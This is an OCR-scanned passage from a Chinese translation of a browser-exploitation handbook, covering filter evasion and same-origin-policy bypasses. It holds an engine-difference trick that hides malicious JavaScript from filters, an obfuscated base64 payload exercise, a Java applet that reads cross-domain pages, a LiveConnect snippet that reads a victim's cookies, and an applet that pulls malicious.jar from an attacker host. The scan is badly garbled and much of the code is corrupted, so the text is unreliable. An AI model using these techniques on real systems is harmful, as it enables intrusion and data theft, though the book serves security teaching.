泻 染 引擎 间 的 JavaScript 差 异 ， 增 大 反 模 糊 的 难度 。 利 用 这 些 差异 可 以 让 代码 有 不 同 的 执行 路 径 ， 
而 这 取决 于 反 模 糊 时 使 用 的 是 什么 JavaScript 引 警 。 

比如 , Trident( IE 的 引擎 ) 在 对 下 面 的 代码 求 值 时 返回 true, 而 Gecko 和 WebKit 则 返回 false: 

Ne 

另 一 种 识别 下 的 类 似 方法 是 使 用 条 件 注释 ,因为 条 件 注释 只 在 正中 有 效 。 下 面 再 看 一 个 简单 
的 例子 ， 这 里 的 布尔 取 反 操作 符 ! ， 只 有 在 通过 ecc_on 启 用 条 件 注释 的 情况 下 才 起 作用 : 

is_ie=/*@cc_on!@*/false; 

如 果 是 IE 在 对 这 行 代码 求 值 ， 就 会 将 其 解释 为 :false， 从 而 让 变量 is_ie 的 值 为 true。 而 
在 其 他 浏览 器 中 ， 由 于 会 把 布尔 取 反 操作 符 看 成 代码 注释 ， 所 以 变量 is_ie 的 值 都 将 为 false。 

现在 , 假设 你 的 目标 是 正 , 而 服务 器 端 HTTP 过 滤 引 擎 使 用 SpiderMonkey( Firefox 的 JavaScript 
引擎 )。 那 么 过 滤 引 擎 (SpiderMonkey ) 在 对 如 下 代码 求 值 时 总 会 进入 else 块 : 


if('\v'=='v'){ 
. // 针对 IE 的 恶意 代码 



















































































)else( 
. // 针对 非 IE 浏览 器 的 非 恶意 代码 
j 


过 滤 引 警 解析 代码 后 会 进入 el se 语句 块 ， 确 定 其 不 包含 恶意 代码 。 然 后 ， 代 理 就 会 允许 整 
个 JavaScript 内 容 发 送 到 客户 端 , 这 样 就 可 能 被 下 浏览 器 执行 。 而 这 一 次 代码 逻辑 则 进入 包含 恶意 
代码 的 语句 块 中 。 

同样 的 思路 也 适用 于 手工 反 模 糊 代 码 的 情境 , 只 要 用 来 评估 代码 的 浏览 器 或 其 他 工具 依赖 于 
某 个 特定 的 JavaScript3| 葡 即 可 。 根据 想 要 绕 过 的 过 滤 工 具 不 同 , 我 们 的 例子 也 可 能 会 反 其 道 而 行 
Z, 但 意思 是 一 样 的 。 

















3.5 小结 


在 本 章 中 , 我 们 认识 到 了 持续 控制 是 攻击 浏览 器 的 前 提 。 建 立 通信 渠道 并 且 持 久 化 控制 ,对 
于 成 功 征服 目标 而 言 至 关 重 要 。 

这 一 章 展示 了 很 多 实现 通信 和 持久 化 的 技术 , 至 于 选择 使 用 哪个 或 哪些 方法 则 取决 于 你 , E 
要 还 是 看 效果 。 一 种 可 能 的 方案 是 在 与 浏览 器 通信 时 , 可 以 使 用 标准 的 XMLHEtpRequest 通 信 渠 
道 ， 而 后 在 支持 的 情况 下 再 自动 升级 到 WebSocket 协 议 。 更 进一步 ， 可 以 利用 内 符 框 架 和 底层 弹 
出 窗口 ， 实 现 持久 化 的 目标 。 最 佳 选择 还 是 要 看 具体 的 攻击 环境 。 

保持 对 目标 浏览 器 的 控制 ， 让 我 们 有 机 会 将 不 同 的 攻击 代码 模块 化 , 同时 实时 作出 决定 。 这 
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样 才 能 进入 所 谓 的 攻击 反馈 循环 。 某 个 特定 的 操作 可 能 会 导致 一 个 问题 ， 而 对 这 个 问题 的 深入 研 
究 又 会 暴露 更 多 问题 。 利 用 这 种 方法 ， 你 可 以 选择 作出 不 同 的 决定 。 比 如 ,你 可 以 找到 目标 浏览 
器 本 地 网 络 中 所 有 活动 的 主机 ， 然 后 选择 只 扫描 它们 的 端口 。 

此 外 , 本 章 还 探讨 了 各 种 降低 你 的 指令 被 过 滤 掉 的 可 能 性 的 技术 。 使 用 这 些 方 法 会 让 简单 的 
手工 分 析 更 加 困难 。 当 然 , 这 些 方 法 的 有 效 性 还 要 看 你 使 用 了 什么 模糊 技术 ,以 及 目标 使 用 了 什 
么 防护 技术 。 

在 掌握 了 各 种 可 用 于 持续 控制 目标 浏览 器 的 技术 后 , 你 该 知道 怎么 利用 浏览 带 的 功能 对 其 自 
身 发 起 攻击 了 。 接 下 来 的 几 章 将 聚焦 在 攻击 浏览 需 上 面 。 














3.6 ”问题 


(1) 使 用 WebSocket 协 议 相 比 使 用 xmlHttpRequest 有 什么 优势 ? 

(2) 描述 一 下 基于 DNS 的 通信 渠道 的 原理 ， 为 什么 说 它 很 适合 实现 隐蔽 通信 ? 

(3) 怎么 才 算 勾 连 浏览 器 ? 

(4) 为 什么 在 不 能 使 用 内 能 框架 时 ， 可 以 使 用 浏览 器 中 间 人 ? 

(5) 空白 字符 编码 躲避 技术 的 工作 原理 是 什么 ? 

(6) 假设 有 一 个 被 Web 过 波 措 施 保护 的 网 络 。 那 么 你 会 针对 它 使 用 什么 躲避 技术 ? 怎么 组 织 
这 些 技术 ? 

(7) 为 什么 时 间 延 迟 躲 避 技 术 能 有 效 避 开 恶 意 软件 检测 ? 

(8) 请 举 出 一 个 劫持 DOM 事 件 的 例子 。 

(9) 你 觉得 什么 持久 化 技术 最 可 靠 ” 你 会 组 合 使 用 前 面 介绍 的 技术 吗 ? 

(10) 以 下 编码 的 字符 串 会 干什么 ”可 以 在 https:Wbrowserhackercom 下 载 它们 。 


ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUscil7ZT1mdW5jdGlvbihjKXty 
ZXR1cm4gYy50biNOcmluZzyhhKX07aWYoIlScnLnJlcGxhY2UOL14vLFNO 
cmluZykpe3doaWxlKGMtLSlyW2UoYyldPWtbYy118fGUoYyk7azlbZnVu 
Y3Rpb240ZS17cmVOdXJuIHJbZV19XTCtlPWZ1bmNOaW9uKCl7cmVOdXJu 
JixcdysnfTtjPTF903doaWxlKGMtLSlpZihrW2NdKXA9CcC5yZXBsYWNI1 
KG5ldyBSZWdFeHAoJ1xcYicrZShjKSsnXFxiJywnZycpLGtbY10pO3Jl 
dHVybiBwfSgnZiAzKGEpe2k9XCdcXHZcJz09XCd2XCc7O0CghaS17Mi5o 
KFwnNlwnKVswXS43KGEpfX07czOyWl1wnOVwnKlwnYlwnKlwnYlwnWilwn 
ZFwnXSgvZS8sXCclXCcpXShcJ2dcJyk7ND0iai5rL2wiKyIl6MS5tLm4u 
byIrlIi8vOnAiOzQucSgilikucigpLnQoIilpO3MudT13KHgoInk9PSIp 
KTszKHMpOycsMzUSMzUSJ3x8Z2G9jdWllbnR8eGlydU1ESnxuZGh5c3xF 
bGVtfGhlYWR8YXBwZW5kQO2hpbGR8aWZ8Y3J8fGVhdGV8NDIzNDIzc2Rm 
d2VlbnRlbnR8cmVwbGF;jZXw0MjMOMjNzZGZ3ZWVudHxmdW5;jdGlvbnxz 
Y3JpcHR8Z2VORWxlbWVudHNCeVRhZ05hbWV8fHNqfGtvb2h8MDAwM3w3 
Nnw2MXwyNzF8cHROaHxzcGxpdHxyZXZlcnNlfHxqb2lufHNyY3x8ZXZh 
bHxhdG9ifEluTnFMbXR2YjJndkl1EQXdNem94TGpjMkxqWXhMakkzTVMA 
dk9uQj BkR2dpTG50a2JHbDBLQO1pS1ZzbmNtVjJKeXNuWVdGaFlXRW5X 
eWR5WlhCcllXTmxKMTBvTDJGaFlXRmhMeXduWlhKelpTY3BYU2dwV3lk 
CWIybHVKMTBvSWlJCE93Jy5zcGxpaáCgnfCcpLDAse30pKQ-- 


要 查看 问题 的 答案 ， 请 访问 本 书 网 站 https:/browserhacker.comyanswers ， 或 者 Wiley 的 网 站 
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http:/www.wiley.comy/go/browserhackershandbook。 
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SOP， 即 同 源 策略 ， 榴 怕 是 Web 领 域 中 最 重要 的 安全 机 制 了 。 可 惜 不 同 浏览 器 对 它 的 实现 有 
很 大 的 差异 。 如 果 SOP 不 起 作用 ,或 者 说 被 绕 过 去 了 ， 那 么 万 维 网 的 核心 安全 机 制 就 失效 了 。 

SOP 的 意图 是 限制 不 相关 的 源 之 间 通 信 。 换 句 话 说 ， 如 果 http://browserhacker.com 想 访问 
http://browservictim.com 中 的 信息 ，SOP 是 不 允许 的 。 当 然 , 根据 你 使 用 了 什么 浏览 器 ,或 者 使 用 
了 什么 浏览 器 插件 ， 这 个 问题 也 并 非 总 是 如 此 简单 。 

本 章 就 来 分 析 各 种 绕 过 SOP 的 技术 。SOP 是 浏览 器 安全 的 关键 ,因此 也 许 当 你 读 到 这 些 技术 
时 ,这 些 漏洞 可 能 已 经 被 补 上 了 。 同 样 ,研究 也 不 会 止步 ,也 很 难说 不 会 有 新 的 技术 在 改进 原 有 
技术 的 基础 上 出 现 。 

在 使 用 绕 过 SOP 技 术 时 ,经常 可 能 会 把 被 勾 连 的 浏览 器 作为 HTTP 代 理 ， 通 过 它 访问 其 他 目 
标 。 没 错 ， 听 起 来 有 点 怪异 ， 但 看 完 本 章 你 就 知道 这 是 可 能 的 了 。 


4.1 理解 同 源 策略 


SOP 把 拥有 相同 主机 名 、 协 议和 端口 的 页 面 视 为 来 自 同一 个 来 源 。 如 果 这 三 个 属性 中 的 任何 
一 个 不 一 样 ， 那 就 是 来 自 不 同 源 的 资源 。 来 自 同样 的 主机 名 、 协 议和 端口 的 资源 之 间 的 交互 不 受 
限制 。 

SOP 最 初 只 是 针对 外 部 资源 所 作 的 规定 , 但 后 来 就 扩展 到 了 其 他 类 型 的 来 源 ， 其 中 包括 使 用 
file 访 问 本 地 文件 和 使 用 chrome 访 问 浏览 器 相关 的 资源 。 

下 面 我 们 打 个 比方 来 说 明 SOP 的 原理 。 假 设 有 一 家 医院 ， 开 始 的 时 候 ， 这 家 医院 的 所 有 病人 
都 来 自 外 部 。 在 某 个 时 间 点 ,医院 里 可 能 会 容纳 很 多 病人 ,这 些 病 人 谁 也 不 认识 谁 。 如 果 有 一 个 
病人 向 医护 人 员 索 要 其 他 病人 的 病历 或 相关 信息 ， 那 就 会 被 拒绝 。( 可 能 经 过 反复 地 请 求 ， 会 得 
到 其 他 医院 的 允许 ! ) 类 似 地 ， 如 果 随 便 一 个 社会 人 员 向 医院 申请 访问 或 探视 任何 病人 ， 那 医院 
会 核实 他 们 与 病人 是 否 关 系 密切 一 一 来 自 同 一 个 家 庭 或 来 源 一 一 然后 才能 决定 是 否 批准 。 

现在 , 假设 有 一 家 医院 允许 病人 自由 交流 , 包括 查阅 医院 保存 的 病人 资料 ， 而 且 还 可 以 跟 医 
院外 部 的 人 交流 。 这 就 是 没有 SOP 的 浏览 

现实 情况 更 复杂 。 比 如 ， 有 一 个 针对 XMLHEttpReduest 、DOM 访 问 和 cookie 的 SOP。 甚 至 针 
对 Java、Flash 和 Silverlight 等 不 同 插件 ,还 有 各 自 对 应 的 SOP， 而 且 每 个 都 有 自己 的 怪异 行为 和 不 
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同 实现 。 考 虑 到 这 么 多 差异 ， 你 就 能 理解 防御 者 要 保护 一 个 来 源 的 安全 有 多 么 困难 了 。 

不 止 如 此 ，Web 应 用 之 间 的 确 有 充分 的 理由 需要 跨 域 通信 。 其 中 一 些 跨 域 通信 技术 第 3 章 也 
介绍 过 , 包括 XHR 轮 询 、WebSocket 协 议 、windqow.postMessacge() 困 数 和 DNS 隧道 。 接 下 来 的 
几 节 会 展示 更 多 Web 应 用 间 跨 域 通信 的 例子 。 
































4.1.1 SOP 与 DOM 


在 决定 JavaScript 及 其 他 协议 如 何 访问 DOM 时 ， 需 要 评 佑 URL 的 三 个 部 分 : 主机 名 、 协 议和 
端口 。 如 果 两 个 站 点 拥有 相同 的 主机 名 、 协 议和 端口 ， 那 么 就 可 以 访问 DOM。 唯 一 的 例外 是 正 ， 
它 在 授权 DOM 访 问 时 只 验证 主机 名 和 协议 。 

对 于 所 有 脚本 都 来 自 同一 来 源 的 情况 , 这 没 问 题 。 但 很 多 时 候 ， 同 一 根 域 名 下 面 可 能 会 有 其 
他 主机 ， 该 主机 需要 访问 源 页 面 的 DOM。 比 如 ， 对 于 一 系列 使 用 中 心 认 证 服务 器 的 站 点 ， 
store.browservictim.com 可 能 需要 通过 login.browservictim.com 来 认证 。 

此 时 ， 这 些 站 点 可 以 使 用 aocument .aomain 属 性 ， 人 允许 同一 域名 下 的 其 他 站 点 访问 DOM。 
要 允许 来 自 login.browservictim.com 的 代码 访问 store.browservictim.com 中 的 表单 , 开发 人 员 可 以 为 
同一 根 域名 的 两 个 站 点 都 设置 aocument .domain 属 性 : 

document.domain = "browservictim.com" 

DOM 中 有 了 这 条 声明 ,SOP 就 对 根 域 名 下 的 所 有 页 面 开放 了 。 换 句 话说 , 属于 browservictim. 
com 域 名 的 任何 页 面 ， 都 可 以 访问 当前 页 面 的 DOM 了 。 不过, 设置 这 些 值 的 时 候 有 一 些 限 制 。 一 
且 SOP 对 根 域名 开放 ， 就 不 能 再 设防 了 。 

为 了 演示 这 一 点 ,可 以 尝试 对 根 域名 设置 document .domain 属 性 。 然 后, 再 尝试 施加 限制 。 
可 是 ， 在 针对 根 域名 放 开 SOP 之 后 ， 再 想 限 制 回 去 ， 就 会 引发 错误 : 


// 当前 域 : store.browservictim.com 
document .domain = "browservictim.com"; // Ok 
















































































// 当前 域 : browservictim.com 
document .domain = "store.browservictim.com"; // Error 


在 这 样 放 开 SOP 之 前 ， 开 发 人 员 应 该 了 解 这 样 做 的 可 能 后 果 。 如 果 是 运营 环境 下 ， 有 人 上 线 
了 wikidevbrowservictim.com, 那么 这 个 新 站 点 中 的 漏洞 就 会 危及 store.browservictim.com。 也 就 是 
说 ， 如 果 攻 击 者 能 够 利用 未 打 补丁 的 漏洞 ， 把 恶意 代码 上 传 到 wikidev 子 域 ， 那 么 该 代码 就 拥有 
了 访问 登录 站 点 的 权限 。 结 果 可 能 是 泄露 信息 或 XSS、XSRF 和 其 他 类 型 的 攻击 。 























4.1.2 SOP 与 CORS 


默认 情况 下 ， 如 果 使 用 XMLHttpRequest 对 象 (XHR ) 向 不 同 来 源 发 送 请 求 ， 那 你 就 会 读 不 
到 响应 。 但 是 ， 请 求 还 是 会 到 达 目 标 网 站 。 对 路 域 请 求 来 说 ， 这 是 一 个 非常 有 用 的 特性 ， 第 9 章 
和 第 10 章 在 介绍 其 他 攻击 技术 时 还 会 再 讨论 。 

SOP 阻 止 你 读 取 HTTP 响 应 首部 或 主体 。 而 放 开 SOP， 人 允许 XHR 跨 域 通 信 的 一 个 办 法 ， 就 是 
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使 用 CORS。 如 果 browserhacker.com 源 返回 以 下 响应 首部 , 那么 browservictim.com 的 每 个 子 域 都 会 
打开 与 browserhackercom 的 双向 通信 渠道 : 


Access-Control-Allow-Origin: *.browservictim.com 
Access-Control-Allow-Methods: OPTIONS, GET, POST 
Access-Control-Allow-Headers: X-custom 
Access-Control-Allow-Credentials: true 


第 一 个 HTTP 响应 首部 很 好 理解 ， 其 他 几 个 分 别 指定 了 请 求 可 以 使 用 opPTIONS 、GET 或 PosT 
方法 , 并且 要 包含 X-custom 首 部 。 另 外 要 注意 ，Access-Control-Allow-Credentials 首 部 允许 对 资源 
的 认证 通信 。 可 以 通过 以 下 代码 片段 来 解释 : 
ar url ‘http: //browserhacker.com/authenticated/user'; 
ar xhr new XMLHttpRequest () 
hr.open('GET', url, true); 
hr.withCredentials = true; 


hr.onreadystatechange = do_something(); 
hr.send() ; 


前 面 的 例子 要 取得 /authenticated/user 资 源 ， 要 求 通过 凭证 访问 。 而 将 withcredentials 设 置 
为 true， 就 可 以 启用 JavaScript 认 证 。 


41.3 SOP 与 插件 


理论 上 讲 ， 如 果 插 件 来 自 http://browserhacker.com:80/， 那 它 就 只 能 访问 http://browserhacker. 
com:80/。 而 在 实践 中 , 事情 并 不 那么 简单 。 正如 本 章 所 要 讲 的 , Java, Adobe Reader, Adobe Flash 
和 Silverlight 等 都 实现 了 SOP , 但 多 数 都 缺乏 一 致 性 , 因此 过 去 出 现 了 各 式 各 样 的 绕 过 SOP 的 技术 。 

每 一 种 主要 的 浏览 器 插件 对 SOP 都 有 自己 的 实现 方式 ， 比 如 某 些 版 本 的 Java 认 为 ， 只 要 两 个 
域 的 IP 地 址 一 样 , 那 它们 就 是 同 源 的 。 在 虚拟 主机 的 环境 下 , 多 个 域名 可 能 对 应 着 同一 个 全 地址 ， 
那 Java 的 这 个 实现 几乎 是 致命 的 。 

Adobe 的 PDF 阅读 器 和 Flash 捅 件 一 直 存 在 重大 安全 漏洞 ,其 中 大 多 数 漏 洞 允 许 执行 任意 代码 ， 
因此 安全 风险 远 高 于 绕 过 SOP。 不 过 ， 绕 过 SOP 同 样 也 会 影响 这 两 个 插件 。 

Adobe Flash 提 供 了 一 种 管理 跨 域 通信 的 机 制 ， 就 是 不 同 的 源 都 要 在 网 站 根 目录 下 放 一 个 
crossdomain.xml 文 件 ， 文 件 内 容 类 似 如 下 所 示 : 


<?xml version="1.0"?> 
<cross-domain-policy> 
<site-control permitted-cross-domain-policies="by-content-type"/> 
<allow-access-from domain="*.browserhacker.com" /> 
</cross-domain-policy> 


有 了 这 个 文件 ，browserhacker.com 的 所 有 子 域 就 可 以 在 应 用 中 相互 通信 了 。 

Java 和 Silverlight 的 SOP 也 用 类 似 的 方式 开放 , 因为 这 两 个 插件 都 支持 crossdomain.xml。 而 且 ， 
Silverlight 还 支持 clientaccesspolicyxml。 在 发 出 跨 域 请 求 时 ， cM 文件 ， 如 
果 没 找到 ， 则 会 再 查找 crossdomain.xml。 这 两 个 插件 都 有 自己 的 问题 ， 稍 后 我 们 会 介 纤 
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4.1.4 通过 表面 伪装 理解 SOP 


界面 伪装 (Ulredressing )， 简 单 地 说 ， 就 是 通过 修改 用 户 界面 的 视觉 元 素 ， 达 到 掩盖 实施 恶 
意 活动 的 目的 。 在 一 个 可 见 的 按钮 上 面 放 一 个 透明 的 提交 按钮 ， 单 击 后 执行 恶意 操作 ， 或 者 改变 
光标 位 置 ,让 用 户 的 移动 或 单 击 操作 不 符合 自己 的 预期 ， 这 些 都 属于 界面 伪装 。 界 面 伪装 攻击 一 
直 是 一 种 成 功 的 技术 ， 本 章 后 面 会 讲 到 ，Facebook 和 其 他 流行 网 站 都 遭 到 过 这 种 攻击 。 

界面 伪装 攻击 绕 过 SOP 的 方式 不 一 样 。 其 中 一 些 (漏洞 已 经 修复 ) 依赖 这 样 一 个 事实 : CHA 
主 窗口 到 内 骸 框 架 ， 内 骨 框 架 之 间 ， 以 及 窗口 之 间 执 行 拖 放 操 作 时 ,不 强制 应 用 SOP。 另 一 些 则 
依赖 在 请 求 查询 网 页 源 代码 时 ， 不 强制 应 用 SOP。 




































































4.1.5 通过 浏览 器 历史 理解 SOP 


获取 浏览 吉 历 史 可 能 侵害 终端 用 户 的 隐私 。 第 $ 章 将 主要 介绍 这 种 以 用 户 隐 私 为 目标 的 攻击 ， 
但 本 章 也 会 介绍 一 些 攻击 浏览 器 历史 的 例子 。 

其 中 一 些 这 样 的 攻击 依赖 于 经 典 的 SOP 实 现 缺陷 , 比如 http 协 议 可 以 访问 其 他 协议 (browser, 
about 或 mx )。 这 些 攻 击 可 以 在 Avant 和 Maxthon 这 两 个 没 那 么 有 名 ，, 但 在 中 国有 很 多 用 户 的 浏览 
中 得 手 。 

另 一 些 更 复杂 的 攻击 涉及 利用 SOP 在 加 载 跨 域 资源 时 的 不 规范 问题 。 这 些 攻 击 可 用 于 揭示 浏 
览 器 之 前 访问 过 的 网 站 。 


4.2 Zt SOP 技术 


不 同 开发 者 对 SOP 的 理解 并 不 相同 。 而 复杂 多 样 的 解读 对 我 们 攻击 浏览 器 是 非常 有 利 的 。 

提高 攻击 成 功率 的 一 个 方法 是 找到 绕 过 SOP 的 技术 。 然 后 ， 就 可 以 利用 被 害 浏览 器 发 动 进 一 
步 攻 击 ， 这 并 不 限于 对 互联 网 ， 也 包括 对 内 部 网 ， 甚 至 对 本 地 文件 系统 。 

以 下 儿 小 厄 将 演示 绕 过 SOP 的 可 能 方案 ， 主 要 通过 利用 浏览 右 择 件 、 浏 览 絮 实现 差异 ， 其 至 
通过 第 三 方 应 用 。 当 然 , 这 些 方案 远 非 全 部 , 但 可 以 作为 比较 常见 而 且 成 功 的 绕 行 方 案 的 入 门 向 
导 。 在 了 解 了 这 些 基础 知识 后 ,第 6 章 、 第 7 章 和 第 8 章 将 进一步 探讨 更 多 绕 过 SOP 的 技术 。 















































4.2.1 #4 Java 中 绕 过 SOP 


Java 1.7u17 和 Java 1.6u45 在 不 同 的 域 返回 相同 耳 的 情况 下 ， 不 会 贯彻 SOP。 换 句 话 说， 如 果 
browserhacker.com 和 browservictim.com 都 解析 到 同一 个 IP， 那 么 Java 小 程序 就 可 以 发 送 跨 域 请 求 
并 读 取 响应 。 

查 一 查 Java 6 和 Java 7 的 文档 ,特别 是 URL 对 象 的 equals 方 法 !, 会 看 到 如 下 表述 :“ 如 果 两 个 
主机 名 可 以 解析 为 同一 个 卫 地 址 ， 则 将 它们 看 成 同一 个 主机 ……” 显 然 ， 这 是 Java 中 SOP 实 现 的 
漏洞 ( 本 书写 作 时 还 没有 修复 )。 在 虚拟 主机 环境 中 ， 这 个 漏洞 是 非常 容易 利用 的 ， 因 为 同一 台 
服务 器 和 同一 个 耻 可 能 会 对 应 数 百 个 域名 。 
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看 下 面 的 例子 ,假设 www.browserhacker.com 和 www.browservictim.com 都 解析 到 IP 地 址 
192.168.0.2: 


$ cat /etc/hosts/ 
192.168.0.2 www.browservictim.com 
192.168.0.2 www.browserhacker.com 


那么 在 下 面 的 Java 小 程序 中 ,在 调用 getInfo () 方 法 时 ， 就 会 创建 一 个 java.net .URL 的 新 
实例 ， 通 过 它 可 以 从 www.browserhacker.com 的 一 个 指定 URL 中 提取 内 容 : 


import java.applet.*; 
import java.awt.*; 
import java.net.*; 
import java.util.*; 
import java.io.*; 


public class javaAppletSop extends Applet { 
public javaAppletSop() { 

super (); 

return; 


} 


public static String getInfo()( 
String result = ""; 
try { 
URL url = new URL("http://www.browserhacker.com" + 
"/demos/secret page.html"); 
BufferedReader in - new BufferedReader( 
new InputStreamReader (url.openStream())); 


String inputLine; 


while ((inputLine - in.readLine()) !- null) 
result «- inputLine; 
in.close(); 


} 
catch (Exception exception) { 
result = "Exception: " + exception.toString(); 
} 
return result; 
} 
j 


现在 编译 前 面 的 小 程序 ， 并 将 其 各 和 人 wWww.browservictim.com 的 某 个 HTML 页 面 。 接 下 来 , 在 
Firefox 中 通过 Java 插 件 1.6u45 或 1.7017 版 打开 该 页 面 。 般 入 小 程序 的 HTML 代 码 如 下 : 


<html> 
em 
Tested on: 
- Java 1.7u17 and Firefox (CtP allowed) 
- Java 1.6u45 and IE 8 
ERU 
<body> 
<embed id='javaAppletSop' code='javaAppletSop' 
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type='application/x-java-applet' 
codebase='http://browservictim.com/' height='0' 
width='0'name='javaAppletSop'></embed> 
<!-- use the following one for IE --> 
xl 
«applet id-'javaAppletSop' code-'javaAppletSop' 
codebase-'http://browservictim.com/' height='0' 
width='0'name='javaAppletSop'></applet> 

EE 

«script» 

// HESARI, EP X CCP 

function getInfo()( 

output - document.javaAppletSop.getInfo(); 

if (output) alert (output); 

j 


setTimeout (function() {getInfo();},5000); 
oe EE 
</body> 


</html> 


如 图 4-1 中 的 弹出 对 话 框 所 示 ， 可 以 看 到 已 经 从 www.browservictim.com 取 得 了 demos/secret _ 
page.html 的 内 容 ， 因 为 Java 不 认为 该 域 与 www.browserhacker.com 不 一 样 。 











@ www.browservictim.com/demos/basic.html c | ( B- Google 


<!-- Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net Browser Exploitation Framework (BeEF) - 
http://beefproject.com See the file 'doc/COPYING' for copying permission--><html><head> <title>Secret 
Page</title></head><body> <h1>Secret page</hi> <p> This page is not hooked by beef. However 
you should still be capable of accessing it using the Requester. </p> <label for="imptxt">Insert your 
secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p></body></htmi> 


meme 


ic: Applet resized and added to parent container 
: PERF: AppletExecutionRunnable - applet.init() BEGIN ; jvmLaunch dt 159448 us, pluginInit dt 
ic: Applet initialized 
: Starting applet 
ic: completed perf rollup 
: Applet made visible 
ic: Applet started 
: Told clients applet is started 
network: Cache entry not found [url: http://www.browserhacker.com/demos/secret page.html, version: 
network: Connecting http://www.browserhacker.com/demos/secret page.html with proxy-DIRECT 
network: Connecting http://www.browserhacker.com:80/ with proxy-DIRECT 
network: Downloading resource: http://www.browserhacker.com/demos/secret page.html 
Content-Length: 537 
Content-Encoding: null 
network: Wrote URL http://www.browserhacker.com/demos/secret page.html to File /Users/morru/Librar 
cache: Adding MemoryCache entry: http://www.browserhacker.com/demos/secret page.html 
network: CleanupThread used 4385906 us 
security: Accessing keys and certificate in Mozilla user profile: null 
security: JSS is not configured 








| Clear | | Copy | 








图 4-1 未 签名 的 小 程序 可 以 跨 域 取得 内 容 


这 里 的 关键 是 小 程序 使 用 URL、BufferedReader 和 InputStreamReader 对 象 的 权限 。 在 
Java 1.6 中 ,平常 的 未 签名 的 小 程序 可 以 在 用 户 不 介入 的 情况 下 运行 ( 除非 是 在 比较 新 的 浏览 器 
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未 经 签名 的 小 程序 必须 通过 用 户 授权 才能 运行 )。 在 Java 1.7 中 ， 小 程序 必须 经 用 户 明确 许可 





里 ， 
才能 运行 ， 用 户 必 须 单 击 Run ( 运行 ) 按钮 才能 执行 。 








这 是 因 为 2013 年 上 半年 Java 1.7 在 第 11 次 更 新 时 ，Oracle 修 改 了 小 程序 的 交付 机 制 。 Jur, 用 
户 必须 通过 点 击 播放 (Click to Play) 功能 ， 才 可 以 运行 签名 的 及 未 签名 的 小 程序 。 这 个 机 制 刚 
开始 的 实现 被 Immunity” 绕 过 了 ， 结 果 Oracle 又 打 了 一 次 补丁 。 此 外 ， 从 Java 7u21 开 始 ，Oracle 又 





更 新 了 -点击 播放 安全 对 话 框 ， 以 根据 小 程序 的 类 型 区 分 显示 给 用 户 的 消息 。 
同样 ， 从 终端 用 户 的 角度 看 ， 两 个 签名 的 小 程序 运行 在 7u21 以 上 的 Java 版 本 中 ， 











个 在 沙 箱 


个 在 沙 箱 外 ， 它 们 的 差别 就 在 于 一 个 词 "。 如 果 签名 padis 这 需要 在 沙 箱 外 运行 的 权限 ， 
ae 给 用 户 的 消息 是 “...will run with unrestricted access . 。 如 果 签 名 的 小 程序 运行 在 沙 箱 




















里 ， 那 么 显示 给 用 户 的 消息 就 是 “...will run with restricted access ...”。 可 以 看 到 ， 这 两 条 


着 非常 小 的 差异 。 这 里 的 真正 问题 在 于 ， 有 多 少 用 户 能 注意 到 那么 小 \ 的 差异 ? 不 管 怎样 ， 








运行 ”还 是 有 效 地 屏蔽 了 通过 Java 偷 偷 绕 过 SOP 的 机 会 








消息 di 
“ 单 击 


Mario Heiderich 提 到 过 ，Firefox 中 的 LiveConnect API 和 Java 插 件 都 可 用 时 ，Java 存 在 怪异 行 
为 。LiveConnect 在 Firefox 15 及 更 早 版 本 中 ， 暴 露 了 一 个 Packages DOM 对 象 。 通 过 这 个 对 象 ， 
可 以 直接 在 DOM 中 调用 Java 对 象 及 方法 。 下 面 是 一 个 使 用 Packages DOM 对 象 绕 过 SOP 的 示例 : 





























<script> 
var url = new Packages.java.net.URL("http://browservictim.com/cookie.php"); 
var is = new Packages.java.io.BufferedReader ( 

new Packages.java.io.InputStreamReader (url.openStream())); 

var data- s 1! 

while ((1 = is.readLine()) != null) { 

data+=1; 

} 

alert (data) 

</script> 








而 通过 Packages 调 用 Java 代 码 时 ， 会 出 现 一 个 比较 危险 的 副作用 。 假 如 代码 在 Firefox 15% 











更 早 版 本 中 ， 通 过 Java 1.7 以 下 版 本 执行 ， 就 会 完全 绕 过 痛 aus 仓 的 “ 单 击 运 行 ”机 制 。 








览 器 是 Firefox， 而 且 它 启用 了 LiveConnect API， 那 么 浏览 器 静默 的 本 性 就 会 强化 这 种 通过 





程序 绕 过 SOP 的 可 能 性 。 

















如 果 浏 
Java 小 


另 一 个 可 以 用 来 绕 过 SOP 的 Java 漏 洞 是 CVE-2011-3546， 在 被 发 现 10 个 月 后 的 2011 年 底 被 修 
复 了 。Adobe Reader 中 也 有 一 个 绕 过 SOP 的 类 似 方法 ， 下 一 小 节 会 继续 讨论 。Neal Poole XH, 


























如 果 用 于 加 载 小 程序 的 资源 收 到 一 个 301 或 302 重 定向 应 答 , 那么 重 定向 的 来 源 而 不 是 目标 , 会 被 


确定 为 小 程序 的 源 。 比 如 下 面 的 代码 : 


<applet 

code="malicious.class" 
archive="http://browservictim.com?redirect_to= 
http: //browserhacker.com/malicious.jar" 
width="100" height="100"></applet> 





我 们 肯定 会 认为 ， 如 果 这 里 的 小 程序 想 要 访问 browservictim.com， 那 么 SOP 就 会 起 作用 。 当 
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然 ， 此 时 还 应 该 抛 出 违反 SOP 的 错误 。 这 是 一 个 没有 缺陷 的 SOP 实 现 该 做 的 ， 因 为 这 个 小 程序 的 
源 是 browserhacker.com。 然 而 ，Java 1.7 和 Java 1.6u27 ( 及 之 前 版 本 ) 认为 ， 重 定向 的 来 源 也 是 有 
效 的 源 。 实 践 当 中 , 这 意味 着 可 以 访问 受到 开放 性 重 定 向 (OpenRedirection ) 缺陷 影响 的 任何 源 。 
于 是 ， 小 程序 会 从 重 定向 的 目标 (也 就 是 攻击 者 控制 的 网 站 ) 被 加 载 ， 而 受害 的 源 ( 受到 开放 性 
重 定 向 攻击 的 源 ) 则 是 重 定向 的 来 源 。 

Frederik Braun’ 发 现 了 Java 1.7u5 及 更 早 版 本 中 的 另 一 个 有 意思 的 绕 行 方案 ， 被 Oracle 后 来 在 
Java 1.7u9 中 堵 住 了 。 这 个 方案 涉及 Java 的 URL 对 象 C 前面 例子 中 用 过 )， 把 ftp 和 f11e 等 URI 协 议 
的 使 用 列 人 了 路 域 请 求 的 黑 名 单 ， 但 却 人 允许 jar 协 议 ， 这 样 就 可 以 创建 像 下 面 这 样 有 效 的 URI: 

jar:http://browserhacker.com/secret.jar 

